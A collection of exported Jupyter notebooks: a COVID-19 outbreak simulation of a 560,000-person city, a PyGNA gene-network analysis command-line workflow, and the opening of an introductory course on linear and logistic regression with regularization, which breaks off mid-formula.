DAYS_OF_SYMPTOMS 5
DEFAULT_COVID SARS-CoV-2
DURATION_OF_ISOLATION 10
MEAN_NETWORK_SIZE 9.0
PROB_APPLY_FOR_TEST_IF_SYMPTOMS 0.75
PROB_GET_TEST_IF_TRACED 0.75
PROB_INFECT_IF_TOGETHER_ON_A_DAY {'SARS-CoV-2': 0.025, 'B.1.1.7': 0.039}
PROB_ISOLATE_IF_SYMPTOMS 0.75
PROB_ISOLATE_IF_TESTPOS 0.3
PROB_ISOLATE_IF_TRACED 0.3
PROB_NON_C19_SYMPTOMS_PER_DAY 0.01
PROB_SYMPTOMATIC 0.6
PROB_TEST_IF_REQUESTED 1
PROB_TRACING_GIVEN_CONTACT 0.6000000000000001
SIMULATOR_PERIODS_PER_DAY 1
TEST_DAYS_ELAPSED 1
VACCINATION_IMMUNITY {'AstraZeneca': {'SARS-CoV-2', 'B.1.1.7'}, 'Pfizer': {'SARS-CoV-2', 'B.1.1.7'}}
_PROPORTION_OF_INFECTED_WHO_GET_TESTED 0.44999999999999996
_TARGET_R0 1.4
###Markdown
We are going to work with a city of roughly 560,000 people.
###Code
pop = CityPopulation(560000, society.Society())
###Output
2021-03-28 19:59:40,688 INFO:Building a set of 224000 households from which to build a population
2021-03-28 20:00:33,047 INFO:220051 households of mean size 2.54
2021-03-28 20:00:35,895 INFO:101252 buildings of mean size 5.53
2021-03-28 20:01:00,548 INFO:1461 classrooms of mean size 28.87
2021-03-28 20:01:00,792 INFO:99 care_homes of mean size 105.68
2021-03-28 20:01:01,845 INFO:65449 workplaces of mean size 5.62
2021-03-28 20:01:07,712 INFO:0% of workplaces closed by lockdown, leaving 54869 open, of average Income Decile 5.07 (and st dev 3.13).
2021-03-28 20:01:07,878 INFO:0% of classrooms closed by lockdown, leaving 1185 open, of average Income Decile 4.75 (and st dev 3.10).
2021-03-28 20:01:07,912 INFO:Adding 276204 permanent contact groups
2021-03-28 20:01:08,060 INFO:Adding 28000 ephemeral contact pairs
2021-03-28 20:01:08,845 INFO:Adding 168417 contacts each within one of the 101252 buildings (contact density of 0.75)
###Markdown
Randomly, we put them into fixed and overlapping social groupings, where each person has a small network.
###Code
nets = [len(p.contacts) for p in pop.people]
np.mean(nets)
plt.hist(nets, cumulative=True, density=True, bins=2000)
plt.title('Distribution of network sizes')
plt.axvline(np.mean(nets), color='r')
plt.grid()
###Output
_____no_output_____
###Markdown
Finally ready to simulate: we will place the population that we have created into various settings and societies in the upcoming simulations.
###Code
POP_SIZE = len(pop.people)
PREVALENCE = 1/560 * 4
SCALE_SETTINGS = dict(n_days = 201, pop_size = POP_SIZE, seed_size = int(POP_SIZE*PREVALENCE), population=pop)
SCALE_SETTINGS
###Output
_____no_output_____
###Markdown
Our baseline simulation is of a runaway infection. We start with 4,000 people infected in a population of 560,000. We begin by studying a society where people don't know whether or how to self-isolate:
###Code
s_basic = society.Society(config=dict(PROB_ISOLATE_IF_SYMPTOMS = 0))
o_basic = Outbreak(s_basic, Covid(), **SCALE_SETTINGS).simulate()
o_basic.plot(title=str(SCALE_SETTINGS))
###Output
2021-03-28 20:38:36,570 INFO: Realized R0 of early infections is 1.48
2021-03-28 20:38:36,570 INFO: 56.8 percent of the population was infected during the epidemic
###Markdown
Lets put that on a log scale:
###Code
o_basic.plot(logy=True, title='Non-isolating society: doubling time of about 15 days')
###Output
2021-03-28 20:38:40,830 INFO: Realized R0 of early infections is 1.48
2021-03-28 20:38:40,831 INFO: 56.8 percent of the population was infected during the epidemic
###Markdown
Next, suppose that people know to isolate if they show symptoms, and 75% do so - this is similar to what is going on in the UK now:
###Code
s_isolate = society.Society(config=dict(PROB_ISOLATE_IF_SYMPTOMS = 0.75))
o_isolate = Outbreak(s_isolate, Covid(), **SCALE_SETTINGS).simulate()
o_isolate.plot(title='Isolating society: small but nasty wave')
###Output
2021-03-28 20:45:01,048 INFO: Realized R0 of early infections is 1.14
2021-03-28 20:45:01,049 INFO: 27.5 percent of the population was infected during the epidemic
###Markdown
So, now we can add testing: * initially, here, let's suppose that positive test results are just ignored, while -ve results let people out of isolation:
###Code
s_testignored = society.TestingSociety(config=dict(PROB_ISOLATE_IF_TESTPOS=0))
o_testignored = Outbreak(s_testignored, Covid(), **SCALE_SETTINGS).simulate()
o_testignored.plot(title="Testing, but +ve results ignored: in a sense this is counterproductive \n"
"(-ve result puts people back into society, and into harm's way)")
###Output
2021-03-28 20:54:03,948 INFO: Realized R0 of early infections is 1.21
2021-03-28 20:54:03,950 INFO: 31.9 percent of the population was infected during the epidemic
###Markdown
* Now suppose that people respond to test results, some of the time:
###Code
o_test = Outbreak(society.TestingSociety(), Covid(), **SCALE_SETTINGS).simulate()
o_test.plot(title="Testing, paid attention to a bit")
###Output
2021-03-28 21:03:20,224 INFO: Realized R0 of early infections is 1.16
2021-03-28 21:03:20,225 INFO: 30.5 percent of the population was infected during the epidemic
###Markdown
We add contact-tracing and isolation:
###Code
o_test_trace = Outbreak(society.TestingTracingSociety(), Covid(), **SCALE_SETTINGS).simulate()
o_test_trace.plot(title='Testing, tracing, and isolating', secondary_y=['prop_infected'])
###Output
2021-03-28 21:13:00,473 INFO: Realized R0 of early infections is 0.97
2021-03-28 21:13:00,474 INFO: 10.1 percent of the population was infected during the epidemic
###Markdown
UK society, however, is characterized by testing bottlenecks:
###Code
import codit.society.alternatives as alternatives
o_UK = Outbreak(alternatives.UKSociety(), Covid(), **SCALE_SETTINGS).simulate()
o_UK.plot(title='UK society with TTI bottlenecks - people isolate for longer')
o_contact_test = Outbreak(society.ContactTestingSociety(), Covid(), **SCALE_SETTINGS).simulate()
o_contact_test.plot(title="Testing, tracing&testing&isolating: "
"Also testing contacts doesn't make much difference",
secondary_y=['prop_infected'])
census = pop.census
infector_nets = [len(census[p.infectors[0]].contacts) for p in pop.people if p.infectors]
infected_nets = [len(p.contacts) for p in pop.people if p.infected]
def most_connected_infector(guy):
if len(guy.infectors) == 0:
raise NotImplementedError
return max([len(i.contacts) for i in guy.chain(census) if i is not guy])
max_contacts_chain = [most_connected_infector(person)
for person in pop.people
if len(person.infectors)]
opts = dict(cumulative=True, bins=200, density=True, histtype='step')
plt.hist(nets, color='k', **opts)
plt.hist(infected_nets, color='r', **opts)
plt.hist(infector_nets, color='b', **opts)
plt.hist(max_contacts_chain, color='g', **opts)
plt.title("CDFs of valency for: people (black); infected (red); infectors (blue); max connected in chains (green)")
plt.axhline(1, color='k'); plt.axvline(0, color='k')
plt.grid()
###Output
_____no_output_____ |
Pathway Analysis/Case Studies/code/PyGNA workflow.ipynb | ###Markdown
PyGNA Workflow The workflow involves the following three steps:
1. Generate GMT files from CSV files in case a GMT file isn't available
2. Generate the matrices
3. Perform the analysis for single or multiple genesets and get the results in the form of pdf or png
Data Loading Generating GMT files from a table This is for when you have table data from a CSV or DESeq output. The following utility can be used to generate GMT files from table data.
###Code
$ pygna geneset-from-table <filename>.csv <setname> <filename>.gmt --name-colum <gene_names_column> --filter-column <filter-col> <'less'> --threshold <th> --descriptor <descriptor string>
$ pygna geneset-from-table <deseq>.csv diff_exp <deseq>.gmt --descriptor deseq#for table from deseq
###Output
_____no_output_____
###Markdown
Merging different Genesets It is also possible to merge different setnames into a single gmt file through the function generate-group-gmt. You can override the default parameters to match the columns in your table. *generate-group-gmt* generates a GMT file of multiple setnames: from the table file, it groups the names in the group_col (the column you want to use to group them) and prints the genes in the name_col. Set the descriptor according to your needs. Alternatively, you could simply concatenate all the files. Computing rwr and sp matrices
###Code
$ pygna build-distance-matrix <network> <network_sp>.hdf5
$ pygna build-rwr-diffusion <network> --output-file <network_rwr>.hdf5
###Output
_____no_output_____
###Markdown
Topology Tests
###Code
$ pygna test-topology-module <network> <geneset> <table_results_test>_topology_module.csv --number-of-permutations 100 --cores 4
$ pygna test-topology-rwr <network> <geneset> <network_rwr>.hdf5 <table_results_test>_topology_rwr.csv --number-of-permutations 100 --cores 4
$ pygna test-topology-internal-degree <network> <geneset> <table_results_test>_topology_internal_degree.csv --number-of-permutations 100 --cores 4
$ pygna test-topology-sp <network> <geneset> <network_sp>.hdf5 <table_results_test>_topology_sp.csv --number-of-permutations 100 --cores 4
$ pygna test-topology-total-degree <network> <geneset> <table_results_test>_topology_total_degree.csv --number-of-permutations 100 --cores 4
###Output
_____no_output_____
###Markdown
Association tests If only A_geneset_file is passed, the analysis is run on all pairs of sets in the file. If both A_geneset_file and B_geneset_file are passed, one can specify the setnames for both; if there is only one geneset in a file, setname_X can be omitted. If both sets are in the same file, B_geneset_file does not need to be specified, but the setnames are needed.
###Code
pygna test-association-rwr [-h] [--setname-a SETNAME_A] [--file-geneset-b FILE_GENESET_B] [--setname-b SETNAME_B] [--size-cut SIZE_CUT] [-k] [-c CORES] [-i]
[--number-of-permutations NUMBER_OF_PERMUTATIONS] [--n-bins N_BINS] [--results-figure RESULTS_FIGURE]
network-file file-geneset-a rwr-matrix-filename output-table
Performs comparison of network location analysis.
It computes a p-value for the shortest path distance
between two genesets being smaller than expected by chance.
If only A_geneset_file is passed the analysis is run on all the pair of sets in the file, if both
A_geneset_file and B_geneset_file are passed, one can specify the setnames for both, if there is only one
geneset in the file, setname_X can be omitted, if both sets are in the same file, B_geneset_file can be not
specified, but setnames are needed.
positional arguments:
network-file network file
file-geneset-a GMT geneset file
rwr-matrix-filename .hdf5 file with the RWR matrix obtained by pygna
output-table output results table, use .csv extension
optional arguments:
-h, --help show this help message and exit
--setname-a SETNAME_A
Geneset A to analyse (default: -)
--file-geneset-b FILE_GENESET_B
GMT geneset file (default: -)
--setname-b SETNAME_B
Geneset B to analyse (default: -)
--size-cut SIZE_CUT removes all genesets with a mapped length < size_cut (default: 20)
-k, --keep if true, keeps the geneset B unpermuted (default: False)
-c CORES, --cores CORES
Number of cores for the multiprocessing (default: 1)
-i, --in-memory set if you want the large matrix to be read in memory (default: False)
--number-of-permutations NUMBER_OF_PERMUTATIONS
number of permutations for computing the empirical pvalue (default: 500)
--n-bins N_BINS if >1 applies degree correction by binning the node degrees and sampling according to geneset distribution (default: 1)
--results-figure RESULTS_FIGURE
heatmap of results (default: -)
$ pygna test-association-sp <network> <geneset> <network_sp>.hdf5 <table_results_test>_association_sp.csv -B <geneset_pathways> --keep --number-of-permutations 100 --cores 4
$ pygna test-association-rwr <network> <geneset> <network_rwr>.hdf5 <table_results_test>_association_rwr.csv -B <geneset_pathways> --keep --number-of-permutations 100 --cores 4
###Output
_____no_output_____
###Markdown
Visualisation
###Code
Usage: pygna paint-datasets-stats [-h] [-a ALTERNATIVE] table-filename output-file #GNT barplot
Usage: pygna paint-summary-gnt [-h] [-s SETNAME] [-t THRESHOLD] [-c COLUMN_FILTER] [--larger] [--less-tests LESS_TESTS] output-figure [input_tables [input_tables ...]]#GNT Summary
Usage: pygna paint-comparison-matrix [-h] [-r] [-s] [-a] table-filename output-file#heatmap
Usage: pygna paint-volcano-plot [-h] [-r] [-i ID_COL] [--threshold-x THRESHOLD_X] [--threshold-y THRESHOLD_Y] [-a] table-filename output-file#volcanoplot
###Output
_____no_output_____
###Markdown
Snakemake Workflow 1) Install Snakemake 2) Make changes to the config file and rules files accordingly (changing the path/parameters etc.) 3) Run the analysis. All the steps from above are boiled down to one or two steps.
###Code
snakemake --use-conda -n#dry run
snakemake --snakefile Snakefile_paper --configfile config_paper --use-conda --cores $N#to replicate the results of the paper
###Output
_____no_output_____
###Markdown
To obtain all the results for the single geneset (avoid the first step to have the full regeneration of all files):
###Code
snakemake snakemake --snakefile Snakefile_paper single_all --configfile config_paper_single.yaml -t
snakemake --snakefile Snakefile_paper single_all --configfile config_paper_single.yaml --use-conda
###Output
_____no_output_____
###Markdown
To obtain the results for the multi geneset
###Code
snakemake snakemake --snakefile Snakefile_paper multi_all --configfile config_paper_multi.yaml -t
snakemake --snakefile Snakefile_paper multi_all --configfile config_paper_multi.yaml
###Output
_____no_output_____
###Markdown
Paper Use Case Using the Command Line Since the distance matrices are already built and the merged geneset (gmt) is already obtained, the topology and association analyses can be carried out directly. **Topology Analysis**
###Code
#file names: biogrid_3.168_filtered.tsv merged.gmt goslim.gmt interactome_RWR.hdf5 interactome_SP.hdf5
cd /home/gee3/Documents/PyGNA/data_tcga_workflow/external/
! pygna test-topology-module biogrid_3.168_filtered.tsv merged.gmt table_topology_module3.csv --number-of-permutations 100 --cores 2
! pygna test-topology-rwr biogrid_3.168_filtered.tsv merged.gmt interactome_RWR.hdf5 tableresults_topology_rwr.csv --number-of-permutations 10 --cores 3
! pygna test-topology-internal-degree biogrid_3.168_filtered.tsv merged.gmt table_topology_internal_degree.csv --number-of-permutations 10 --cores 3
! pygna test-topology-sp biogrid_3.168_filtered.tsv merged.gmt interactome_SP.hdf5 table_topology_sp.csv --number-of-permutations 10 --cores 2
! pygna test-topology-total-degree biogrid_3.168_filtered.tsv merged.gmt table_topology_total_degree.csv --number-of-permutations 100 --cores 4
###Output
_____no_output_____
###Markdown
**Association Tests** In a GNA two genesets are tested for their association. When testing a signle geneset against many pathways it is recommended the –keep flag is used. This way, while resampling only the geneset a will be randomly permuted and the geneset b is going to be kept as it is. This strategy is more conservative and is helpful in testing whether the tested geneset is more strongly connected to the pathway (or any other geneset of interest) than expected by chance.
###Code
! pygna test-association-rwr biogrid_3.168_filtered.tsv merged.gmt interactome_RWR.hdf5 table_association_rwr.csv --file-geneset-b goslim_entrez.gmt --keep --number-of-permutations 100 --cores 4
###Output
_____no_output_____
###Markdown
If you don't include the --results-figure flag at the comparison step, plot the matrix as follows
###Code
! pygna paint-comparison-matrix table_association_rwr.csv heatmap_association_rwr.png --rwr --annotate
###Output
_____no_output_____
###Markdown
If setname B is not passed, the analysis is run between each pair of setnames in the geneset, as follows (this is the only difference between the single-geneset and multiple-geneset runs: there is no within comparison in the multi case):
###Code
! pygna test-association-rwr biogrid_3.168_filtered.tsv merged.gmt interactome_RWR.hdf5 table_within_comparison_rwr.csv --number-of-permutations 100 --cores 2
! pygna paint-comparison-matrix table_within_comparison_rwr.csv heatmap_within_comparison_rwr.png --rwr --single-geneset
! pygna test-association-sp biogrid_3.168_filtered.tsv merged.gmt interactome_SP.hdf5 table_association_SP.csv --file-geneset-b goslim_entrez.gmt --keep --number-of-permutations 2 --cores 1
! pygna paint-comparison-matrix table_association_sp.csv heatmap_association_sp.png --rwr --annotate#default heatmap
! pygna test-association-sp biogrid_3.168_filtered.tsv merged.gmt interactome_RWR.hdf5 table_within_comparison_sp.csv --number-of-permutations 2 --cores 2
! pygna paint-comparison-matrix table_within_comparison_sp.csv heatmap_within_comparison_rwr.png --rwr --single-geneset
###Output
_____no_output_____
###Markdown
**Diagnostic** Distribution plot When running a statistical test, one might want to visually assess the null distribution. By passing `-d <output folder>` through the command line (as in the example below), a distribution plot of the empirical null is shown for each test.
###Code
! pygna test-topology-total-degree biogrid_3.168_filtered.tsv merged.gmt diagnstic_total_degree.csv -d "diagnostic/" --number-of-permutations 2 --cores 2
###Output
_____no_output_____
###Markdown
**Visualisation** There are four main types of figures currently implemented in PyGNA, namely bar plots, point plots, heatmaps and volcano plots, to visualize the GNT and GNA results. Barplots are used to plot the GNT results for a single statistic. For each geneset a red bar represents the observed statistic, whereas a blue one represents the average of the empirical null distribution. Conversely, a dot plot can be used to summarize multiple tests for the same geneset. In order to show all the results in the same figure, the observed values are transformed into absolute normalized z-scores, such that all significant tests have z-score >0 and are marked with a red dot. GNA results can instead be visualised on heatmaps, with the color gradients used to report the strength of association between two genesets. When an all-vs-all test is conducted, a lower triangular matrix is shown, with stars denoting significance. If, instead, an M-vs-N test was conducted, a complete heatmap would be included in the plot. Alternatively, volcano plots can be used to visualize one-vs-many GNA results, for testing a geneset against a large number of datasets (e.g. gene ontologies). The plot shows the normalized z-score on the x-axis and the −log10 of the p-value adjusted to control the False Discovery Rate (FDR) on the y-axis. Significant results are shown with red crosses, whereas non-significant associations are represented by blue dots. The plot can be annotated to find the top 5 terms.
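The `pygna paint-volcano-plot` command in the next cell produces this figure for you; purely to illustrate what such a plot encodes, here is a hand-rolled matplotlib sketch. The column names `zscore` and `padj` are assumed placeholders, not PyGNA's actual output schema.
```python
# Illustration only: a hand-rolled volcano plot from a one-vs-many GNA results table.
# Column names 'zscore' and 'padj' are assumptions about the table, not PyGNA's schema.
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt

results = pd.read_csv("table_association_sp.csv")    # adjust path/columns to your table
x = results["zscore"]                                # normalized z-score
y = -np.log10(results["padj"])                       # -log10 of FDR-adjusted p-value
significant = results["padj"] < 0.05

plt.scatter(x[~significant], y[~significant], marker="o", color="blue", label="not significant")
plt.scatter(x[significant], y[significant], marker="x", color="red", label="significant (FDR < 0.05)")
plt.xlabel("normalized z-score")
plt.ylabel("-log10(FDR-adjusted p-value)")
plt.legend()
plt.show()
```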
###Code
! pygna paint-datasets-stats table_topology_module.csv gnt_tm.png #GNT barplot
! pygna paint-summary-gnt dotplt.png #GNT Summary
! pygna paint-comparison-matrix table_association_sp.csv withncomp_sp.pdf #heatmap
! pygna paint-volcano-plot table_association_sp.csv volcno_sp.png #volcanoplot
###Output
_____no_output_____
###Markdown
**Benchmarking** GNT and GNA benchmarking using SBM
###Code
! pygna generate-gnt-sbm "benchmarking/gnt_sbm.tsv" 'benchmarking/gnt_sbm.gmt'
! pygna generate-gna-sbm "benchmarking/gna_sbm.tsv" 'benchmarking/gna_sbm.gmt'
###Output
[50, 50, 50, 50, 50, 50, 700]
INFO:root:Network written on benchmarking/gnt_sbm.tsv
[50, 50, 50, 50, 50, 50, 50, 50, 600]
INFO:root:Network written on benchmarking/gna_sbm.tsv
Generatedbenchmarking/gna_sbm.tsv
###Markdown
GNT and GNA benchmarking using high degree nodes (HDNs)
###Code
! pygna generate-hdn-network benchmarking/ hdn_network
###Output
INFO:root:Reject=True
INFO:root:Reject=True
INFO:root:Nodes: 1000, in LCC: 999
INFO:root:Reject=True
INFO:root:Nodes: 1000, in LCC: 999
INFO:root:Reject=True
INFO:root:Nodes: 1000, in LCC: 999
INFO:root:Reject=False
INFO:root:Nodes: 1000, in LCC: 1000
INFO:root:Network written on benchmarking/hdn_network_s_0_network.tsv
INFO:root:Reject=True
INFO:root:Reject=False
INFO:root:Nodes: 1000, in LCC: 1000
INFO:root:Network written on benchmarking/hdn_network_s_1_network.tsv
INFO:root:Reject=True
INFO:root:Reject=False
INFO:root:Nodes: 1000, in LCC: 1000
INFO:root:Network written on benchmarking/hdn_network_s_2_network.tsv
INFO:root:Reject=True
INFO:root:Reject=True
INFO:root:Nodes: 1000, in LCC: 999
INFO:root:Reject=False
INFO:root:Nodes: 1000, in LCC: 1000
INFO:root:Network written on benchmarking/hdn_network_s_3_network.tsv
INFO:root:Reject=True
INFO:root:Reject=False
INFO:root:Nodes: 1000, in LCC: 1000
INFO:root:Network written on benchmarking/hdn_network_s_4_network.tsv
###Markdown
Given the generated network and node list of HDNs, novel genesets made of mixtures of the two can be generated: starting from the original network with a number of HDNs, the partial, extended, and branching genesets can then be generated. **Adding Extended Genesets** Creates new genesets from the vip list; the number of genesets and the portion of genes can be specified by input. The final new geneset is going to be formed by: percentage ev * HDN_total + ratio * percentage ev * vips total.
###Code
!pygna hdn-add-extended input-geneset-file#Genesets are input to identify
###Output
_____no_output_____
###Markdown
**Adding Partial Genesets** Creates new genesets from the vip list; the number of genesets and the portion of genes can be specified by input.
###Code
!pygna hdn-add-partial input-geneset-file
###Output
_____no_output_____
###Markdown
**Adding Branching Genesets** Creates new genesets from the vip list; the new genesets are created by adding nodes that are 1 step away from the vips. The new genes are added as branches.
###Code
!pygna hdn-add-branching input-geneset-file
###Output
_____no_output_____ |
part1 - intro to ML/intro_to_ML.ipynb | ###Markdown
Welcome to Supervised Learning Part 1: Introduction to machine learning and the bias-variance tradeoff Instructor: Andras Zsom https://github.com/azsom/Supervised-Learning The topic of the course series: supervised Machine Learning (ML)- how to build an ML pipeline from beginning to deployment- we assume you already performed data cleaning- this is the first course out of 6 courses - **Part 1: Introduction to machine learning and the bias-variance tradeoff** - Part 2: How to prepare your data for supervised machine learning - Part 3: Evaluation metrics in supervised machine learning - Part 4: SVMs, Random Forests, XGBoost - Part 5: Missing data in supervised ML - Part 6: Interpretability- you can complete the courses in sequence or complete individual courses based on your interest Tools- we use python - pros: easy to use for a beginner programmer - cons: it is very difficult to write computationally efficient code - the divide between users and developers of python packages are wide- packages we use: sklearn, pandas, numpy, matplotlib, XGBoost, SHAP- if you are a python user, you need to know exactly what you are doing - carefully read the manual, work through the examples, test every line of code you write - good test of your understanding: could I write the function/method myself if I had to? - do not assume your code works, always test everything - there are two types of errors: - one that gives an error message - usually easy to fix - the error message tells you in which line the error occurs - read and understand the error message - if it's not obvious what the error is, read more on it on stackoverflow for example - sneaky errors without error message - these are tough! - your code runs and it gives some output but something is off - just staring at the code won't reveal the bug - print print print or use a debugger - check every line of code, trace issues through the code - to reduce the number of errors/bugs, do test-driven code development - first think about what the output of a function call/cell/piece of a piece of code should be - only then write the code - check if you got the expected output Learning objectives of this courseBy the end of the course, you will be able to- describe how a task like spam filtering can be solved with explicit coding instructions vs. a machine learning algorithm that learns from examples (training data),- summarize the similarities and differences between supervised and unsupervised ML,- list the pros and cons of supervised machine learning,- define the mathematical model behind linear and logistic regression,- explain what the loss function is,- describe the two main types of regularization and why it is important,- perform a simple train/validation/test split on IID data,- apply linear and logistic regression to datasets,- tune the regularization hyperparameter,- identify models with high bias and high variance,- select the best model and measure its performance on a previously unseen dataset, the test set. Module 1: Intro to Machine Learning Learning objectives of this module:- describe how a task like spam filtering can be solved with explicit coding instructions vs. 
a machine learning algorithm that learns from examples (training data),- summarize the similarities and differences between supervised and unsupervised ML,- list the pros and cons of supervised machine learning, Supervised ML- supervised ML is probably the most successful area in ML (based on economic value created) - **online advertising**: given an ad and user info, will the user click on the ad? - **real estate**: given home features, can we predict the house price? - **finance**: given an applicant and a finalcial product (e.g., a loan), will this applicant be able to successfully pay back the loan? - **health care**: given a patient, symptoms, and maybe test results, can we predict the illness? - ...- supervised ML pros: - **automation**: computers perform calculations faster than humans (and computers are cheaper) - **learn from examples**: no need to explicitly tell the computer what to do. the computer figures out what to do based on examples (data)- supervised ML con: - it can be difficult or labor-intensive to collect training data - there is no guarantee that you will be able to develop an accurate model based on the data you have Example: spam filters- Traditional coding pipeline with explicit instructions Example: spam filters- ML pipeline - the data: feature matrix (X) and target variable (Y) - X can be structured (tabular data most commonly stored in excel and csv files or SQL databases) - X can be unstructured (e.g., images, text, voice recording, video) - Y can be categorical, the problem is **classification** (e.g., click or not click on an ad, sick or not sick) - Y can be continuous, the problem is **regression** (e.g., predict house price, stock price, age) - Y can be missing, the problem is **clustering**- **we focus on structured data during the course series!** Structured data| X|feature_1|feature_2|...|feature_j|...|feature_m|Y||-|:-:|:-:|:-:|:-:|:-:|:-:|:-:||__data_point_1__|x_11|x_12|...|x_1j|...|x_1m|__y_1__||__data_point_2__|x_21|x_22|...|x_2j|...|x_2m|__y_2__||__...__|...|...|...|...|...|...|__...__||__data_point_i__|x_i1|x_i2|...|x_ij|...|x_im|__y_i__||__...__|...|...|...|...|...|...|__...__||__data_point_n__|x_n1|x_n2|...|x_nj|...|x_nm|__y_n__| Other areas of ML- unsupervised ML - only the feature matrix X is available, there is no target variable - the goal is to find structure (clusters) in the data - often used in customer segmentation- recommender systems - recommend products to a customer based on what products similar customers enjoyed- reinforcement learning - the learning system, called an agent, can observe the environment, select and perform actions, and get rewards and penalties in return. 
Goal: come up with strategy to maximize rewards - often used when virtual environment is available (e.g., games like go or warcraft) - sounds appealing to use in real environments (like self-driving cars) but agents learn slow, lots of cars would need to be broken to teach an agent to drive this way - deep learning - uses neural networks and often works with unstructured data - technically deep learning is supervised or unsupervised - extremely successful on large datasets Module 2: Overview of linear and logistic regression with regularization Learning objectives of this module:- define the mathematical model behind linear and logistic regression,- explain what the loss function is,- describe the two main types of regularization and why it is important, Supervised ML algorithms: three parts- 1) **a mathematical model ($f$)** is used to convert the feature values into a prediction$f(X_i) = y_i'$, where $i$ is the $i$th data point in our sample. $X_i$ is a vector and $y_i'$ is a number. - $f$ is your supervised ML algorithm - it usually has a number of intrinsic parameters - 2) **an optimization algorithm** is used to determine the intrinsic parameter values given the training set - there are various algorithms - e.g., gradient descent, backpropagation- 3) the optimization algorithm minimizes a metric called **the cost function** - the cost function is used to determine the best intrinsic parameters of one model based on the training data Linear Regression
###Code
# these lines are just illustration
# no X_train or y_train are defined yet so it won't run
from sklearn.linear_model import LinearRegression # import the model
LinReg = LinearRegression() # initialize a simple linear regression model
LinReg.fit(X_train,y_train) # we will learn now what happens when you issue this line
###Output
_____no_output_____
###Markdown
- This is the **mathematical model**: $f(X_i) = y_i' = \theta_0 + X_{i1} \theta_1 + X_{i2} \theta_2 +$ ... $= \theta_0 + \sum_{j=1}^{m} \theta_j X_{ij} $,where $y_i'$ is the prediction of the linear regression model and $\theta$ are parameters.- The **optimization algorithm** is some form of gradient descent - we won't go into detail but the basic idea is that gradient descent will find the $\theta$ values that minimize the cost function on the training data- The **cost function** is MSE - mean squared error $MSE(y,y') = \frac{1}{n}\sum_{i=1}^{n}(y_i'-y_i)^2$ Logistic Regression
###Code
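# illustration only: like the LinearRegression cell above, X_train and y_train are not defined yet, so this cell won't run as-is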
from sklearn.linear_model import LogisticRegression
LogReg = LogisticRegression() # initialize a simple logistic regression model
LogReg.fit(X_train,y_train) # we will learn what happens when you issue this line in classification
###Output
_____no_output_____
###Markdown
- name is misleading, logistic regression is for classification problems!- the model:$f(X_i) = y_i' = \frac{1}{1+e^{-z}}$, where$z = \theta_0 + \sum_{j=1}^{m} \theta_j x_{ij}$- $f(z) = \frac{1}{1+e^{-z}}$ is the sigmoid function which maps real values to be between 0 and 1 such that the real value 0 is mapped to 0.5. - the output of a sigmoid function can be thought of as a predicted probability.
###Code
import numpy as np
import matplotlib.pyplot as plt
def sigmoid(z):
return 1/(1+np.exp(-z))
z = np.linspace(-7,7,50)
print(z)
plt.plot(z,sigmoid(z))
plt.xlabel('input of linear regression')
plt.ylabel('predicted probability')
plt.title('sigmoid transformation')
plt.savefig('figures/sigmoid_trans.png',dpi=300)
plt.show()
###Output
[-7. -6.71428571 -6.42857143 -6.14285714 -5.85714286 -5.57142857
-5.28571429 -5. -4.71428571 -4.42857143 -4.14285714 -3.85714286
-3.57142857 -3.28571429 -3. -2.71428571 -2.42857143 -2.14285714
-1.85714286 -1.57142857 -1.28571429 -1. -0.71428571 -0.42857143
-0.14285714 0.14285714 0.42857143 0.71428571 1. 1.28571429
1.57142857 1.85714286 2.14285714 2.42857143 2.71428571 3.
3.28571429 3.57142857 3.85714286 4.14285714 4.42857143 4.71428571
5. 5.28571429 5.57142857 5.85714286 6.14285714 6.42857143
6.71428571 7. ]
###Markdown
- The **optimization algorithm** is some form of gradient descent- the logloss metric is used as a **cost function** in logistic regression$L(\theta) = - \frac{1}{N}\sum_{i=1}^{n} [y_i\ln(y_i') + (1-y_i)\ln(1-y_i')]$ - two scenarios: - y_i = 0 - left term disappears - y_i = 1 - right term disappears- log(0) is undefined - $y_i'$ is usually replaced with $\max(\min(y_i',1-10^{-15}),10^{-15})$ to avoid this issue**The extreme cases**- the classifier is confidently wrong - $y_i' = 10^{-15}$ for points in class 1 - $y_i' = 1 - 10^{-15}$ for points in class 0$logloss = -\frac{1}{N}\sum \ln(10^{-15}) = -\ln(10^{-15})$ $logloss \sim 34.5 $- the classifier is correct - $y_i' = 10^{-15}$ for points in class 0 - $y_i' = 1 - 10^{-15}$ for points in class 1$logloss = -\frac{1}{N}\sum (1-0)(1-\ln(1-10^{-15})) = 10^{-15}$ for class 0$logloss = -\frac{1}{N}\sum 1*\ln(1-10^{-15}) = 10^{-15}$ for class 1$logloss \sim 0$- the logloss metric also needs to be minimized Regularization- models tend to overfit on the training data and such models don't perform well on previously unseen points - a sure sign of overfitting in linear and logistic regression is huge theta values, much larger than the typical ranges of your features and target variable - overfitting means that the model fits the noise rather than the underlying structure - e.g., fitting a high degree polinomial to a roughly linearly correlated set of points- one way to address this shortcoming of ML models is regularization- let's change the cost function and add a penalty term for large thetas- **Lasso regression**: regularize using the l1 norm of theta: $L(\theta) =$ original cost $+ \color{red}{ \frac{\alpha}{m} \sum_{j=0}^{m}|\theta_j|}$ - **Ridge regression**: regularize using the l2 norm of theta: $L(\theta) =$ original cost $+ \color{red}{\frac{\alpha}{m} \sum_{j=0}^{m} \theta_j^2}$- $\alpha$ is the regularization parameter (0 or larger), it describes how much we penalize large thetas Regulariztion in linear regression- the original cost function is MSE and we add the penalty term- **Lasso regression**: regularize using the l1 norm of theta: $L(\theta) = \frac{1}{n}\sum_{i=1}^{n}[(\theta_0 + \sum_{j=1}^{m} \theta_j x_{ij}- y_i)^2] + \color{red}{ \frac{\alpha}{m} \sum_{j=0}^{m}|\theta_j|}$ - **Ridge regression**: regularize using the l2 norm of theta: $L(\theta) = \frac{1}{n}\sum_{i=1}^{n}[(\theta_0 + \sum_{j=1}^{m} \theta_j x_{ij}- y_i)^2] + \color{red}{\frac{\alpha}{m} \sum_{j=0}^{m} \theta_j^2}$ Regulariztion in logistic regression- the original cost is logloss and we add the penalty term- **Lasso regression**: regularize using the l1 norm of theta:$L(\theta) = - \frac{1}{N}\sum_{i=1}^{n} [y_i\ln(\frac{1}{1+e^{-\theta_0 + \sum_{j=1}^{m} \theta_j x_{ij}}}) + (1-y_i)\ln(1-\frac{1}{1+e^{-\theta_0 + \sum_{j=1}^{m} \theta_j x_{ij}}}))] + \color{red}{ \frac{\alpha}{m} \sum_{j=0}^{m}|\theta_j|}$- **Ridge regression**: regularize using the l2 norm of theta:$L(\theta) = - \frac{1}{N}\sum_{i=1}^{n} [y_i\ln(\frac{1}{1+e^{-\theta_0 